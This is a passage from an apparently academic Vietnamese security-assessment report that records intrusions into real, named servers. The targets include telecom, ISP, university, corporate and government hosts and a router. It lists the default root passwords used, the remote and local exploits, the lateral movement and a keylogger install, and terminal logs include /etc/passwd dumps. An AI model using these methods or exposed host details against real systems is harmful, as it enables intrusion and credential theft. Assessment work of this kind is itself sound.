Sun Microsystems Inc. SunOS 5.7 Generic October 1998
You have new mail.
oms1# w
1:15pm up 103 day(s), 2:48, 2 users, load average: 0.02, 0.02, 0.02
User tty login@ idle JCPU PCPU what
oms console 20Jun03103days /usr/dt/bin/sdt_shell -c unseten
oms pts/3 16Sep0315days /bin/csh
oms pts/7 Sun 7pm 27:55 telnet hlr
oms pts/8 9:42am 3:14 telnet hlr
root pts/9 1:15pm w
oms1#
ii. oms2.lgic.co.kr (10.1.11.13)
1. hệ điều hành: Solaris 7
2. Local IP: 10.1.11.13
Từ máy hrl hay oms1 chỉ cần telnet đến oms2 với user root, passwd root là ta có được
quyền admin trên máy này.
iii. IWM (10.2.105.21)
1. local hostname: IWM
2. Local IP: 10.2.105.21
3. Hệ điều hành: Solaris 6
4. Lỗi remote: telnetd
Từ máy oms2 dùng lệnh arp –a để tìm các máy lân cận, ta thấy có máy IWM, thử
telnet với các user trên các máy đã xâm nhập được và các passwd đơn giản nhưng
không thành công.
Lấy file binary dùng để khai thác lỗi telnetd từ máy của ta vào máy hrl ( vì không
biên dịch được trên các server này).
Từ shell ta thực thi file này và chiếm được user bin trên máy IWM.
5. Lỗi local
- Khai thác lỗi xlock giống như máy hrl nhưng không thành công.
- Với quyền của user bin có thể xem được file /etc/passwd. Ta thấy trong máy này
không có nhiều user, chỉ có user common là có thể tận dụng được, thử su từ bin sang
common và dò password nhưng không thành công.
- Thoát khỏi IWM và quay lại hrl, thực hiện lại file khai thác lỗi telnetd với user là
common, thành công, ta có được shell với quyền của user common. Thử lệnh su ta
được ngay quyền root mà không cần passwprd.
3) 203.162.53.52 ( Stelecom)
a. Hệ điều hành: Solaris 7
b. Hostname: ho_eipa
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
15
c. Local IP: 10.1.120.11 - 10.1.110.21
d. Lỗi remote: Telnetd với password đơn giản
Có thể telnet vào máy này bằng user root và password root.
[root@bugsearch hao]# telnet 203.162.53.52
Trying 203.162.53.52...
Connected to 203.162.53.52 (203.162.53.52).
Escape character is '^]'
SunOS 5.7
+====================================================+
+==== ====+
+==== WELCOME to Hochiminh eip_A ====+
+==== ====+
+====================================================+
login: root
Password:
Last login: Mon Sep 29 13:47:47 from hanoi_eipa
Sun Microsystems Inc. SunOS 5.7 Generic October 1998
You have mail.
ho_eipa# w
1:59pm up 77 day(s), 13:43, 8 users, load average: 0.04, 0.04,
0.04
User tty login@ idle JCPU PCPU what
eip pts/0 10:14am 3:00 -csh
eip pts/3 31Jul03 rmh -c 1
eip pts/2 7:59pm rmh -c 1
eip pts/4 8:02am rmh -c 1
eip pts/5 4:44am 8:43 1 1 vi
AlarmMessage.2003-10-01
eip pts/6 8:39am 5:18 vi
AlarmMessage.2003-09-30
eip pts/7 8:42am 5:04 vi
AlarmMessage.2003-10-01
root pts/8 1:59pm w
ho_eipa#
e. Lỗi local
Vì quyền root đã chiếm được nên không cần xét đến các lỗi local khác.
Ta xem qua file /etc/passwd, có thể server này đã bị tạo user có quyền tương đương
root
ho_eipa# more /etc/passwd
root:x:0:1:Super-User:/:/bin/csh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
cachep01:x:0:1:cachep01@yahoo.com:/:/bin/csh
listen:x:37:4:Network Admin:/usr/net/nls:
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
16
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
nomd:x:1000:1000:EIP User:/home/nomd:/bin/csh
eip:x:1001:1000:EIP Admin:/home/eip:/bin/csh
nms:x:2000:1000:NMS BunDang:/home/nms:/bin/csh
same::0:1:Super-User:/:/bin/csh
-----------------------------------------------------------------
user same có uid=0, gid=1 có quyền tương đương root.
f. Các server lân cận bị khai thác
Dùng lệnh arp –a trên server vừa vào được ta thấy kết quả sau:
ho_eipa# arp -a
Net to Media Table
Device IP Address Mask Flags Phys Addr
------ -------------------- --------------- ----- ---------------
hme0 10.1.120.1 255.255.255.255 00:00:0c:07:ac:78
hme0 ho_eipb 255.255.255.255 08:00:20:fa:6c:c6
hme1 ho_eipaa 255.255.255.255 SP 08:00:20:fa:47:da
hme0 ho_eipa 255.255.255.255 SP 08:00:20:fa:47:da
hme1 224.0.0.0 240.0.0.0 SM 01:00:5e:00:00:00
hme0 224.0.0.0 240.0.0.0 SM 01:00:5e:00:00:00
ho_eipa#
Ta thấy có các host sau 10.1.120.1, ho_eipb, ho_eipaa (chính là
ho_eipa vì cùng MAC address)
thử telnet 10.1.120.1 ta thấy đây là Switch, ho_eipb là 1 máy Sun.
i. ho_eipb
1. hệ điều hành: Solaris 7
2. hostname: ho_eipb
3. Remote exploit: password đơn giản, user root, password root
ii. ha_eipa
1. hệ điều hành: Solaris 7
2. hostname: ha_eipa
3. Remote exploit: password đơn giản, user root, password root
iii. ha_eipb
1. hệ điều hành: Solaris 7
2. hostname: ha_eipb
3. Remote exploit: password đơn giản, user root, password root
iv. Smschoa
1. hệ điều hành: HP-UX
2. hostname: smschoa
3. Local IP: 10.1.80.12
4. Remote exploit: password đơn giản, user root, password root
ho_eipa# telnet 10.1.80.12
Trying 10.1.80.12...
Connected to 10.1.80.12.
Escape character is '^]'.
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
17
HP-UX smschoa B.11.00 U 9000/800 (tb)
login: root
Password:
Please wait...checking for disk quotas
(c)Copyright 1983-1997 Hewlett-Packard Co., All Rights Reserved.
(c)Copyright 1979, 1980, 1983, 1985-1993 The Regents of the Univ. of
California
(c)Copyright 1980, 1984, 1986 Novell, Inc.
(c)Copyright 1986-1992 Sun Microsystems, Inc.
(c)Copyright 1985, 1986, 1988 Massachusetts Institute of Technology
(c)Copyright 1989-1993 The Open Software Foundation, Inc.
(c)Copyright 1986 Digital Equipment Corp.
(c)Copyright 1990 Motorola, Inc.
(c)Copyright 1990, 1991, 1992 Cornell University
(c)Copyright 1989-1991 The University of Maryland
(c)Copyright 1988 Carnegie Mellon University
(c)Copyright 1991-1997 Mentat, Inc.
(c)Copyright 1996 Morning Star Technologies, Inc.
(c)Copyright 1996 Progressive Systems, Inc.
(c)Copyright 1997 Isogon Corporation
RESTRICTED RIGHTS LEGEND
Use, duplication, or disclosure by the U.S. Government is subject to
restrictions as set forth in sub-paragraph (c)(1)(ii) of the Rights
in
Technical Data and Computer Software clause in DFARS 252.227-7013.
Hewlett-Packard Company
3000 Hanover Street
Palo Alto, CA 94304 U.S.A.
Rights for non-DOD U.S. Government Departments and Agencies are as
set
forth in FAR 52.227-19(c)(1,2).
You have mail.
Value of TERM has been set to "vt100".
WARNING: YOU ARE SUPERUSER !!
smschoa:root> w
2:02pm up 49 days, 13:03, 1 user, load average: 4.32, 3.84,
5.02
User tty login@ idle JCPU PCPU what
root pts/tb 2:02p
v. Smschob
1. hệ điều hành: HP-UX
2. hostname: smschob
3. Local IP: 10.1.80.13
4. Remote exploit: password đơn giản, user root, password root
smschoa:root> arp -a
smschob (192.1.1.3) at 0:30:6e:1e:ed:2e ether
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
18
10.1.80.1 (10.1.80.1) at 0:0:c:7:ac:50 ether
smschob (10.1.80.13) at 0:30:6e:1e:ed:5e ether
smschoa:root> telnet 10.1.80.13
Trying...
Connected to 10.1.80.13.
Escape character is '^]'.
Local flow control on
Telnet TERMINAL-SPEED option ON
HP-UX smschob B.11.00 U 9000/800 (ta)
login: root
Password:
Please wait...checking for disk quotas
(c)Copyright 1983-1997 Hewlett-Packard Co., All Rights Reserved.
(c)Copyright 1979, 1980, 1983, 1985-1993 The Regents of the Univ. of
California
(c)Copyright 1980, 1984, 1986 Novell, Inc.
(c)Copyright 1986-1992 Sun Microsystems, Inc.
(c)Copyright 1985, 1986, 1988 Massachusetts Institute of Technology
(c)Copyright 1989-1993 The Open Software Foundation, Inc.
(c)Copyright 1986 Digital Equipment Corp.
(c)Copyright 1990 Motorola, Inc.
(c)Copyright 1990, 1991, 1992 Cornell University
(c)Copyright 1989-1991 The University of Maryland
(c)Copyright 1988 Carnegie Mellon University
(c)Copyright 1991-1997 Mentat, Inc.
(c)Copyright 1996 Morning Star Technologies, Inc.
(c)Copyright 1996 Progressive Systems, Inc.
(c)Copyright 1997 Isogon Corporation
RESTRICTED RIGHTS LEGEND
Use, duplication, or disclosure by the U.S. Government is subject to
restrictions as set forth in sub-paragraph (c)(1)(ii) of the Rights
in
Technical Data and Computer Software clause in DFARS 252.227-7013.
Hewlett-Packard Company
3000 Hanover Street
Palo Alto, CA 94304 U.S.A.
Rights for non-DOD U.S. Government Departments and Agencies are as
set
forth in FAR 52.227-19(c)(1,2).
You have mail.
Value of TERM has been set to "vt100".
WARNING: YOU ARE SUPERUSER !!
smschob:root> w
2:24pm up 101 days, 2:30, 1 user, load average: 0.59, 0.37,
0.35
User tty login@ idle JCPU PCPU what
root pts/ta 2:24pm w
smschob:root>
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
19
4) 203.162.45.152 (FPT)
a. Hệ điều hành: RedHat Linux 7.2
b. Lỗi remote: Apache + openssl
Lỗi này đã được thông báo trên internet khá lâu, các web server chạy apache version
dưới 1.3.27 và openssl có version cũ hơn 0.9.6.
Exploit code cũng đã được public trên các site hacker, security.
Khai thác thành công lỗi này ta có được shell dưới quyền user chạy apache qua port
80 ( thông thường là user apache ).
Đối với server này ta chiếm được shell với quyền của user apache. Tiếp theo ta đưa
chương trình khai thác lỗi local vào để chiếm quyền root.
c. Lỗi local: ptrace
Đa số các kernel Linux version nhỏ hơn 2.4.20 đều bị lỗi này, nếu kernel được biên
dịch lại từ source thì không bị lỗi.
5) 203.162.42.67 ( sng.pwc.com.vn)
a. Hệ điều hành: RedHat Linux 9.0
b. Local IP: 10.161.16.254
c. Lỗi remote: Samba exploit
Lỗi remote Samba trên server này cho phép ta chiếm được shell với quyền root.
Server này là gateway và proxy server, có 02 card mạng
Copy màn hình thực hiện và file /etc/passwd, /etc/shadow
6) 203.162.35.75 (mail.ittivietnam.com)
a. Hệ điều hành: RedHat Linux 7.1
b. Lỗi remote: Samba, apache+ssl
Server này bị xâm nhập thành công qua lỗi apache (version 1.3.23). Chiếm được
remote shell dưới quyền user apache.
c. Lỗi local: ptrace
d. Các backdoor do hacker khác để lại
Khi xâm nhập vào hệ thống, và chiếm quyền root, một số backdoor do các hacker
xâm nhập vào đã được tìm thấy, các file quan trọng trên hệ thống như ls, netstat,
ifconfig đều đã bị thay thế. Trong các lần thâm nhập vào, ta có thể phát hiện ra việc
các hacker dùng server này để scan và làm bàn đạp tấn công các server khác:
Dùng lệnh ps có thể phát hiện ra các proccess dùng để scan này.
bash-2.05a# ps ax|more
PID TTY STAT TIME COMMAND
1 ? S 0:06 init
2 ? SW 0:00 [keventd]
3 ? SWN 0:00 [ksoftirqd_CPU0]
4 ? SW 0:00 [kswapd]
5 ? SW 0:00 [bdflush]
6 ? SW 0:00 [kupdated]
7 ? SW 0:00 [mdrecoveryd]
15 ? SW 0:16 [kjournald]
99 ? SW 0:00 [khubd]
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
20
227 ? SW 0:00 [kjournald]
228 ? SW 0:01 [kjournald]
229 ? SW 0:00 [kjournald]
727 ? S 0:08 syslogd -m 0
732 ? S 0:01 klogd -x
1274 ? S 0:00 CROND
1275 ? S 0:00 /bin/bash /usr/bin/run-parts
/etc/cron.hourly
1288 ? S 0:00 /bin/bash /etc/cron.hourly/openwebmail.cron
1289 ? S 0:00 awk -v
progname=/etc/cron.hourly/openwebmail.cron progn
1290 ? S 0:00 /usr/bin/suidperl -T /dev/fd/3//var/www/cgi-
bin/openweb
1291 ? Z 0:00 [awk ]
1300 ? T 0:00 /bin/hostname
1301 ? Z 0:00 [hostname ]
1388 ? S 0:00 /usr/sbin/sshd
1421 ? S 0:03 xinetd -stayalive -reuse -pidfile
/var/run/xinetd.pid
1462 ? S 0:00 sendmail: accepting connections
1481 ? S 0:00 gpm -t ps/2 -m /dev/mouse
1504 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -
DHAVE_AUTH_
1530 ? S 0:00 crond
1663 ? S 0:00 rhnsd --interval 120
1670 2 S 0:00 /sbin/mingetty tty2
1671 3 S 0:00 /sbin/mingetty tty3
1672 4 S 0:00 /sbin/mingetty tty4
1673 5 S 0:00 /sbin/mingetty tty5
1674 6 S 0:00 /sbin/mingetty tty6
1850 ? S 0:00 CROND
1851 ? S 0:00 /bin/bash /usr/bin/run-parts
/etc/cron.hourly
1864 ? S 0:00 /bin/bash /etc/cron.hourly/openwebmail.cron
1865 ? S 0:00 awk -v
progname=/etc/cron.hourly/openwebmail.cron progn
1866 ? S 0:00 /usr/bin/suidperl -T /dev/fd/3//var/www/cgi-
bin/openweb
1867 ? Z 0:00 [awk ]
1873 ? T 0:00 /bin/hostname
1874 ? Z 0:00 [hostname ]
2617 ? T 0:00 ./ssvuln 210.185.ssl 210.185.ssl.out 35
2625 ? Z 0:00 [ssvuln ]
2666 ? T 0:00 ./ssvuln 210.186.ssl 210.186.ssl.out 35
2678 ? Z 0:00 [ssvuln ]
2866 ? S 0:00 /usr/sbin/sshd
2873 ? S 0:00 -bash
2924 ? S 0:00 ls --color=tty
2938 ? S 0:00 /bin/sh ./assl 210.188
2939 ? R 1:47 ./pscan2 210.188 443
2940 ? T 0:00 ./pscan2 210.188 443
2941 ? Z 0:00 [pscan2 ]
2947 ? S 0:00 sendmail: server msr91.hinet.net
[168.95.4.191] child w
2948 ? S 0:00 sendmail: ./h7M0pMI02948 msr91.hinet.net
[168.95.4.191]
2954 ? S 0:00 sendmail: server [203.162.23.26] child wait
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
21
2957 ? S 0:00 sendmail: server [203.162.23.26] cmd read
2958 ? R 0:00 ps ax
2959 ? R 0:00 -bash
7581 1 S 0:00 /sbin/mingetty tty1
30246 ? S 0:00 -bash
30419 ? T 0:00 ./ssvuln 215.30.ssl 215.30.ssl.out 35
30423 ? Z 0:00 [ssvuln ]
30424 ? T 0:00 ./oops 215.30.ssl.out
30426 ? Z 0:00 [oops ]
30647 ? S 0:00 CROND
30648 ? S 0:00 /bin/bash /usr/bin/run-parts
/etc/cron.hourly
30659 ? S 0:00 /bin/bash /etc/cron.hourly/openwebmail.cron
30660 ? S 0:00 awk -v
progname=/etc/cron.hourly/openwebmail.cron progn
30661 ? S 0:00 /usr/bin/suidperl -T /dev/fd/3//var/www/cgi-
bin/openweb
30662 ? Z 0:00 [awk ]
30685 ? T 0:00 /bin/hostname
30686 ? Z 0:00 [hostname ]
31703 ? S 0:00 CROND
31704 ? S 0:00 /bin/bash /usr/bin/run-parts
/etc/cron.hourly
31717 ? S 0:00 /bin/bash /etc/cron.hourly/openwebmail.cron
31718 ? S 0:00 awk -v
progname=/etc/cron.hourly/openwebmail.cron progn
31719 ? S 0:00 /usr/bin/suidperl -T /dev/fd/3//var/www/cgi-
bin/openweb
31720 ? Z 0:00 [awk ]
31729 ? T 0:00 /bin/hostname
31730 ? Z 0:00 [hostname ]
32385 ? S 0:00 CROND
32386 ? S 0:00 /bin/bash /usr/bin/run-parts
/etc/cron.hourly
32399 ? S 0:00 /bin/bash /etc/cron.hourly/openwebmail.cron
32400 ? S 0:00 awk -v
progname=/etc/cron.hourly/openwebmail.cron progn
32401 ? S 0:00 /usr/bin/suidperl -T /dev/fd/3//var/www/cgi-
bin/openweb
32402 ? Z 0:00 [awk ]
32423 ? T 0:00 /bin/hostname
32424 ? Z 0:00 [hostname ]
32425 ? S 0:00 CROND
32426 ? S 0:00 /bin/bash /usr/bin/run-parts /etc/cron.daily
32589 ? S 0:00 /usr/sbin/sendmail -FCronDaemon -i -odi -oem
root
32615 ? S 0:00 awk -v
progname=/etc/cron.daily/makewhatis.cron prognam
32617 ? Z 0:00 [awk ]
32743 ? T 0:00 /usr/bin/awk
32748 ? Z 0:00 [awk ]
1643 ? S 0:00 /usr/sbin/atd
1363 ? S 0:00 named -u named
1365 ? S 0:00 named -u named
1366 ? S 0:00 named -u named
1367 ? S 0:00 named -u named
1368 ? S 0:00 named -u named
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
22
780 ? S 0:00 rpc.statd
752 ? S 0:00 portmap
1584 ? S 0:00 xfs -droppriv -daemon
1508 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY –
(bỏ bớt một số dòng tiếp theo)
bash-2.05a#
7) 203.162.33.35-router (Đại học sư phạm Tp HCM)
a. version IOS
dhsp#show version
Cisco Internetwork Operating System Software
IOS (tm) C2600 Software (C2600-I-M), Version 12.1(16), RELEASE
SOFTWARE (fc1)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Tue 09-Jul-02 02:33 by kellythw
Image text-base: 0x80008088, data-base: 0x8082C938
ROM: System Bootstrap, Version 12.2(7r) [cmong 7r], RELEASE SOFTWARE
(fc1)
dhsp uptime is 1 week, 4 days, 9 hours, 28 minutes
System returned to ROM by power-on
System image file is "flash:c2600-i-mz.121-16.bin"
cisco 2620XM (MPC860) processor (revision 0x100) with 53248K/12288K
bytes of memory.
Processor board ID JAD07070YJF (2656094087)
M860 processor: part number 5, mask 2
Bridging software.
X.25 software, Version 3.0.0.
1 FastEthernet/IEEE 802.3 interface(s)
10 Low-speed serial(sync/async) network interface(s)
32K bytes of non-volatile configuration memory.
16384K bytes of processor board System flash (Read/Write)
Configuration register is 0x2102
b. lỗi bảo mật
Lỗi cơ bản nhất đó là không đặt password telnet, khi telnet vào
router ta được ngay ….
[root@bugsearch /]# telnet 203.162.35.33
Trying 203.162.35.33...
Connected to 203.162.35.33 (203.162.35.33).
Escape character is '^]'.
dhsp>
4.4 Bước tiếp theo, thử enable, password được hỏi, sau vài lần thử, ta thành công với
một password đơn giản.
[root@bugsearch /]# telnet 203.162.35.33
Trying 203.162.35.33...
Connected to 203.162.35.33 (203.162.35.33).
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
23
Escape character is '^]'.
dhsp>
dhsp>
dhsp>
dhsp>en
Password:
Password:
dhsp#
Với quyền này ta hoàn toàn có khả năng sửa đổi được cấu hình router, tuy nhiên vì
đây chưa phải là mục đích cuối cùng nên ta cần khai thác router để tìm cách tấn công
vào web server.
8) 203.162.17.97 (hot.vnn.vn)
Đây là server webhosting của vasc, có khá nhiều trang web được hosting trên server
này, kể cả www.bkav.com.vn (có thể tham khảo file httpd.conf).
a. Hệ điều hành: Solaris 7
b. Lỗi remote: Telnetd, bị khai thác và lấy remote shell dưới quyền user bin.
c. Lỗi local: priocntl
Tương tự như server suntest.vnnic.net, lỗi này cũng được khai thác thành công trên
server này.
9) 203.162.4.30 (VDC2)
a. Hệ điều hành: Solaris 7
b. Lỗi remote: telnetd
c. Lỗi local: printioctl
10) 203.162.0.41 ( radius.vnn.vn)
a. Hệ điều hành: Solaris 7
b. Lỗi remote: telnetd
c. Lỗi local: priocntl
11) 203.144.70.17 ( cambodia)
a. Hệ điều hành: Linux Suse
b. Lỗi remote: Samba
c. Lỗi local: ptrace
12) 203.162.17.142
a. Hệ điều hành: WindowNT
b. Lỗi bị khai thác: RPC, DCOM
date
Tue Jul 29 02:04:53 ICT 2003
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>mkdir bg
mkdir bg
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
24
C:\WINNT\system32>dir
dir
Volume in drive C is VIB
Volume Serial Number is 381C-0A3F
Directory of C:\WINNT\system32
07/29/2003 01:08a .
07/29/2003 01:08a ..
12/03/2002 04:16p 1,070 $winnt$.inf
06/27/2001 01:47p 2,151 12520437.cpx
06/27/2001 01:47p 2,233 12520850.cpx
06/10/1999 02:50p 437,528 401COMUPD.EXE
12/07/1999 12:00p 32,016 aaaamon.dll
12/07/1999 12:00p 67,344 access.cpl
08/29/2002 07:06a 64,512 acctres.dll
12/07/1999 12:00p 150,800 accwiz.exe
12/07/1999 12:00p 61,952 acelpdec.ax
12/07/1999 12:00p 131,856 acledit.dll
07/22/2002 12:05p 78,096 aclui.dll
12/07/1999 12:00p 4,368 acsetupc.dll
12/07/1999 12:00p 17,168 acsetups.exe
13) 203.162.17.142
a. Hệ điều hành: WindowNT
b. Lỗi bị khai thác: RPC, DCOM
date
Fri Aug 29 15:23:53 ICT 2003
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>mkdir bg
mkdir bg
C:\WINNT\system32>cd d:
cd d:
D:\
C:\WINNT\system32>d:
d:
The device is not ready.
C:\WINNT\system32>e:
e:
The system cannot find the drive specified.
C:\WINNT\system32>dir c:\
dir c:\
Volume in drive C has no label.
Volume Serial Number is 5057-5682
Directory of c:\
11/07/2002 06:35p 2,975 1
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
25
11/07/2002 06:21p 0 a
11/06/2002 11:58a Documents and Settings
11/06/2002 11:39a Inetpub
04/08/2003 08:18a 13,030 PDOXUSRS.NET
02/28/2003 03:23p 3,072,573 pi_winproxy.exe
02/28/2003 03:24p Program Files
01/15/2003 08:32a SOFT
11/06/2002 04:39p virus
02/27/2003 01:55p WINNT
11/06/2002 05:03p 1,958 WinProxy.cfg
5 File(s) 3,090,536 bytes
6 Dir(s) 5,906,014,208 bytes free
C:\WINNT\system32>
14) 203.162.5.126
a. Hệ điều hành: WindowNT
b. Lỗi bị khai thác: RPC, DCOM
date 072823552003
Mon Jul 28 23:55:00 ICT 2003
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
D:\WINNT\system32>mkdir bg
mkdir bg
A subdirectory or file bg already exists.
D:\WINNT\system32>c:
c:
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 947B-CC93
Directory of C:\
07/29/2003 02:05p 111
07/02/2003 04:46p
3797132a906c136b43bf566cd6582ae3
06/18/2003 05:05p AMERIC
07/10/2003 11:50a AuditNTPass
07/30/2003 08:12p CISCO
04/23/2003 06:01p 6,694 CLDMA.LOG
11/21/2002 10:01a Container
11/03/2002 02:09p demo_CCNA
06/28/2003 03:41p Download
15) 203.162.6.115 - www.cp.com.vn
a. Hệ điều hành: WindowNT
b. Lỗi bị khai thác: RPC, DCOM
Tue Jul 29 01:20:01 ICT 2003
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
26
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>mkdir bg
mkdir bg
C:\WINNT\system32>nslookup
nslookup
Default Server: hcmc.saigonnet.vn
Address: 203.162.6.97
C:\WINNT\system32>ipconfig /all
ipconfig /all
Windows 2000 IP Configuration
Host Name . . . . . . . . . . . . : cpvietnam
Primary DNS Suffix . . . . . . . : cpvietnam
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : cpvietnam
www.cp.com.vn
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : www.cp.com.vn
Description . . . . . . . . . . . : Compaq NC7760 Gigabit
Server Adapter
Physical Address. . . . . . . . . : 00-08-02-EF-D2-98
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 203.162.6.115
Subnet Mask . . . . . . . . . . . : 255.255.255.224
Default Gateway . . . . . . . . . : 203.162.6.100
DNS Servers . . . . . . . . . . . : 203.162.6.97
203.162.0.11
Primary WINS Server . . . . . . . : 199.1.1.31
C:\WINNT\system32>dir c:
dir c:
Volume in drive C has no label.
Volume Serial Number is FC0D-D2A5
Directory of C:\WINNT\system32
07/29/2003 12:16a .
07/29/2003 12:16a ..
08/19/2002 07:54a 304 $winnt$.inf
03/29/2002 03:32p 2,151 12520437.cpx
03/29/2002 03:32p 2,233 12520850.cpx
16) 203.162.7.81
a. Hệ điều hành: WindowNT
b. Lỗi bị khai thác: RPC, DCOM
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
27
date
Fri Aug 1 16:24:34 ICT 2003
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>mkdir bg
mkdir bg
C:\WINNT\system32>ipconfig /all
ipconfig /all
Windows 2000 IP Configuration
Host Name . . . . . . . . . . . . : rep1
Primary DNS Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Broadcast
IP Routing Enabled. . . . . . . . : Yes
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Local Area Connection 2:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 82546EB Based
Dual Port Network Connection #2
Physical Address. . . . . . . . . : 00-07-E9-04-E3-B8
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 203.162.7.81
Subnet Mask . . . . . . . . . . . : 255.255.255.224
Default Gateway . . . . . . . . . : 203.162.7.67
DNS Servers . . . . . . . . . . . :
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 82546EB Based
Dual Port Network Connection
Physical Address. . . . . . . . . : 00-07-E9-04-E3-B9
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 203.160.0.12
Subnet Mask . . . . . . . . . . . : 255.255.255.0
IP Address. . . . . . . . . . . . : 192.168.49.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
DNS Servers . . . . . . . . . . . : 203.162.7.80
PPP adapter RAS Server (Dial In) Interface:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : WAN (PPP/SLIP) Interface
Physical Address. . . . . . . . . : 00-53-45-00-00-00
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.50.1
Subnet Mask . . . . . . . . . . . : 255.255.255.255
Default Gateway . . . . . . . . . :
DNS Servers . . . . . . . . . . . :
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
28
PPP adapter {3671431D-5E69-4B81-A8E3-B397BD3D5581}:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : WAN (PPP/SLIP) Interface
Physical Address. . . . . . . . . : 00-53-45-00-00-00
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 10.0.0.17
Subnet Mask . . . . . . . . . . . : 255.255.255.255
Default Gateway . . . . . . . . . :
DNS Servers . . . . . . . . . . . :
17. Máy chủ ITPMO.hochiminhcity.gov.vn (203.162.97.125) và các máy chủ liên
qua.
Đây là các server được admin upgrade khá thường xuyên. Qua khảo sát, chúng tôi
thấy không thể dùng exploit trực tiếp trên các lỗi của OS. Nhóm nghiên cứu đã phải
có phương thức khác với những phương thức đã tiến hành với các máy chủ khác để
xâm nhập. Cũng xin lưu ý là việc xâm nhập thành công vào ITPMO cũng nhờ thêm
vào sự quen biết mang tính chất xã hội của nhóm nghiên cứu với admin của máy chủ
này. Nhóm nghiên cứu tập trung đầu tiên vào điểm yếu nhất của hệ thống: Khoa Toán
trường KHTN. Đầu tiên xâm nhập được máy chủ của thư viện KHTN
Khai thác thành công lỗi Samba, chiếm được root shell.
Cài key-logger theo kiểu load kernel module
Có thể lấy được password login từ console hoặc remote
Kết quả: lấy được passwd của user root
Sau đó xâm nhập sang máy chủ portal.math.hcmuns.edu.vn, mathdep.hcmuns.edu.vn
qua các lỗi tương tự.
Sau đó, xâm nhập qua đích cuối cùng là itpmo vì máy này có cùng cơ sở dữ liệu
người sử dụng với máy trên !!!
[vdchai@itpmo vdchai]$
[vdchai@itpmo vdchai]$ su
Password:
[root@itpmo vdchai]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/bin/bash
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
